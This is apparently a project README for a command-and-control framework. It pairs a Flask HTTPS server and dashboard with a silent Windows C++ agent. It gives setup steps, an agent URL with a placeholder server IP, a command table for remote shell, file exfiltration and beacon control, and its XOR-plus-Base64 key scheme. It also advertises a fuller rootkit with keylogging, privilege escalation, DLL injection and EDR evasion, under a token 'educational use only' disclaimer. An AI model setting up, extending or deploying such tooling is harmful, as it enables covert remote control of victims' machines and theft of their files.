HTTPS Command & Control infrastructure with web dashboard for remote Windows agent management.
⚠️ Educational Use Only - Illegal use = your responsibility.
- HTTPS C2 server with TLS encryption (Flask)
- Real-time web dashboard
- XOR + Base64 encrypted protocol
- SQLite database for persistent storage
- Remote shell, file exfiltration, beacon control
- Silent agent with no debug output
Server:
cd server
pip install flask
python c2_server.pyAccess dashboard: https://localhost:8443
Client:
build.batEdit client/c2_client.cpp to set your server IP:
wstring c2ServerUrl = L"https://YOUR_SERVER_IP:8443";| Command | Syntax | Description |
|---|---|---|
shell |
shell <cmd> |
Execute shell command |
exfil |
exfil <path> |
Exfiltrate file (Base64) |
sleep |
sleep <seconds> |
Change beacon interval |
ping |
ping |
Test connectivity |
die |
die |
Terminate agent |
Encryption: XOR + Base64
Key: Hostname + Username + "SecretKey2025"
Transport: HTTPS (port 8443)
Agent → POST /api/checkin → Server (get commands)
Agent → POST /api/result → Server (send results)
Server: Python 3.9+, Flask
Client: MinGW-w64 GCC 15.2+, Windows SDK, C++17
This C2 framework is extracted from the XvX Usermode Rootkit project. The full rootkit version includes a more complete C2 with over 15 commands, including process/file/registry hiding, SYSTEM privilege escalation, interactive reverse shells, keylogger functionality, DLL injection, and EDR evasion techniques. This standalone version provides the core C2 infrastructure for educational purposes and easy integration into custom projects.
Author: 28zaakypro[@]proton[.]me
